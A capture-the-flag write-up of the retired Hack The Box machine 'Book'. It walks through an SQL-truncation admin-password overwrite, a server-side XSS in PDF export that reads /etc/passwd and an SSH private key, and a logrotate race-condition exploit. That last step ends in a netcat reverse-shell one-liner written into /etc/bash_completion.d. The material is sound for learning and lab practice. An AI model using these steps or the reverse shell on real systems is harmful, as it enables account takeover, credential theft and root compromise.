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Hack The Box :: Book

 ·  ☕ 6 min read  ·  🧔🏻 noobintheshell

Book is a Medium Linux box created by MrR3boot. It was released on February 22nd, 2020 and retired on July 11th, 2020. The users rated the difficulty 6.2/10 and gave an appreciation score of 4.1/5.

Book Info Card
Book Info Card


We access a virtual library where we can download, upload and comment books. The account registration flow contains a vulnerability that allows overwriting any user’s password. We overwrite the admin’s and to access the admin panel. There, we can download a PDF file containing the list of the books of the virtual library. There is a Server-Side XSS vulnerability during the generation of PDFs. From a user account, we can inject some XSS code to read local files that will be executed server-side when we generate a PDF as admin. We leak the user reader SSH private key this way and grab the user flag. The server uses a version of logrotate vulnerable to a Race Condition. As it is run as a cronjob as root, we can elevate our privileges and get the root flag.

Reconnaissance & Enumeration

Open Ports

An NMAP scan shows the following (partial) output:

$ sudo nmap -sS -sV -p-

22/tcp  open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))

We discover the usual SSH server and HTTP ports opened.

Web discovery

We access a login page where we can register to access a virtual library:

website home page
website home page

As a user, we have access to the following features:

  • we can download PDFs on flowers:
books download
books download

The download links are like:

and the files downloaded are like 1.pdf. So maybe a good spot for Arbitrary File Read or Local File Inclusion.

  • we can search for books in the database:
search books
search books

Maybe a SQL Injection to exploit here? The GET request is like:
  • we can submit books feedbacks:
book feedback
book feedback

When we do that we get the following message:

Your feedback sent to Administrator.

So maybe an XSS or CSRF to exploit here.

  • we can submit new documents:
book submission
book submission

Whatever we submit, we get the following message:

Thanks for the submission. We will evaluate and update the list

This could be a good spot for file upload vulnerabilities.

  • we can contact the admin:
contact form
contact form

Another spot for XSS or CSRF vulnerabilities. We get as well the admin email address that could be useful later.

  • finally, we can view our profile and modify our name:
profile information
profile information

Maybe we can exploit a missing access control check issue here and force our account with an Admin role instead of User.

A basic file/directory scan discovers the following:

$ gobuster dir -w ../../wordlists/big.txt -u -x php
/admin (Status: 301)
/books.php (Status: 302)
/contact.php (Status: 302)
/db.php (Status: 200)
/docs (Status: 301)
/download.php (Status: 302)
/feedback.php (Status: 302)
/home.php (Status: 302)
/images (Status: 301)
/index.php (Status: 200)
/logout.php (Status: 302)
/profile.php (Status: 302)
/search.php (Status: 302)
/settings.php (Status: 302)

The /admin page shows a Sign In feature, but it is disabled.

Gaining Access

As we have seen, there is room for plenty of vulnerabilities to exploit. Unfortunately, most of them are rabbit-holes. There is an XSS vulnerability in the name but it is limited to 10 characters, so except injecting some basic HTML like "><<h1>A we cannot do much.

When we create an account, a Javascript code checks that the username is not longer than 10 characters and that the email address is not longer than 20. This check is as well done server-side. The account ID seems to be the email address as we can create multiple accounts with the same name as long as the email is unique. But what if the email truncation is done after the ID is checked and before the data is persisted in the database? This means that we could possibly rewrite another user account data…like the admin account. By creating an account with the following POST data:

name=noobadmin&email=admin%40book.htb AAAA&password=noobadmin

we successfully overwrite the admin password! The email address is first checked to be unique, then truncated to 20 characters, trimmed and finally, a SQL query persists the password. We can now login into the admin panel:

admin panel
admin panel

We now have access to the following admin features:

  • list users and delete them,
  • read user messages and delete them,
  • read user feedbacks and delete them,
  • download the list of users and books as PDF.

When downloading the user list, we see that one of the tests we did previously (the HTML injection in the name) is output:

user data PDF export
user data PDF export

But we are still limited to 10 characters here. The other PDF lists the book names and authors, let’s try the same there. From a user account, we make a new book submission and inject some HTML code like <h1>TESTTEST</h1>. This results in:

collection data PDF export
collection data PDF export

Good, we can execute Javascript without filters apparently. After a little research on what to do with that, I came upon this article describing how to exploit a Server-Side XSS when generating a PDF dynamically. That’s quite neat. Let’s try to read /etc/passwd. The payload is:

  x=new XMLHttpRequest;  

We put it as the book title or the author…and we get:

arbitrary file read
arbitrary file read

We find the unique user reader. Let’s check if it holds an SSH private key:

  x=new XMLHttpRequest;  

And surprise:

reader SSH private key
reader SSH private key

We can simply copy/paste the whole content and use it to grab the user flag:

$ ssh -i reader_rsa reader@
$ cat user.txt

Local Reconnaissance & Enumeration

We find an script in reader home folder which is a Linux enumeration script. We can launch it but it does not show any useful information.

There is as well a backup folder that contains some Apache access.log* files. This suggests that logrotate is used. The version of logrotate is 3.11.0. This version is vulnerable to a Race Condition and the tool logrotten can be used to exploit it.

With pspy64, we confirm that there is a cronjob that calls logrotate as root:


Privilege Escalation

As per the logrotten readme file, we check all the prerequisites:

  • logrotate is run as root,
  • we have write access in the folder where access.log is rotated,
  • we do not have access to /root/log.cfg file but we can see that logrotate can create files.

Let’s compile logrotten on the server:

$ gcc lr.c -o lr
$ chmod +x lr

We can execute the following command:

$ echo “test”>/home/reader/backups/access.log && ./lr -d /home/reader/backups/access.log

This will create an empty access.log file under /etc/bash_completion.d with reader as owner. All files in this folder are loaded with each new user session:


We can now write our reverse shell in /etc/bash_completion.d/access.log, start a Netcat listener and wait for root to execute it:

$ echo “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 1234 >/tmp/f” > /etc/bash_completion.d/access.log
root flag
root flag

We can grab root private SSH key on the way in /root/.ssh.


This was a really enjoyable box where I learned a new attack vector: Arbitrary File Read through server-side XSS!


[1] Server Side XSS (Dynamic PDF)

[2] Linux Smart Enumeration

[3] logrotten

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AppSec Engineer and CTFer